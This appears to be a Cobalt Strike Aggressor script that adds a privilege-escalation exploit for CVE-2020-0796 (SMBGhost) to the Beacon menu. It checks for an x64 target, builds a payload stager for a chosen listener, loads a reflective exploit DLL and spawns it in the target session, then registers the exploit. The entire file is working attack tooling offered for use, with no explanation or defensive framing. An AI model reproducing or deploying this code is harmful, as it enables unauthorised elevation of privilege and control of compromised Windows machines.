sub CVE_2020_0796 {
	local('$stager');
	if (!-is64 $1) {
		berror($1, "cve-2020-0796 exploit is x64 only");
		return;
	}
	btask($1, "Task Beacon to run " . listener_describe($2) . "CVE-2020-0796");
	$stager = payload_local($1, $2, "x64", "thread");
	$stager = pack("I-", strlen($stager)) . $stager;
	$dll = getFileProper(script_resource("PrivilegeEscalation/ReflectionDLL/"), "CVE_2020_0796_x64.dll"); 
	bdllspawn!($1, $dll, $stager, "cve-2020-0796", 5000);
}
beacon_exploit_register("CVE_2020_0796", "CVE-2020-0796", &CVE_2020_0796);
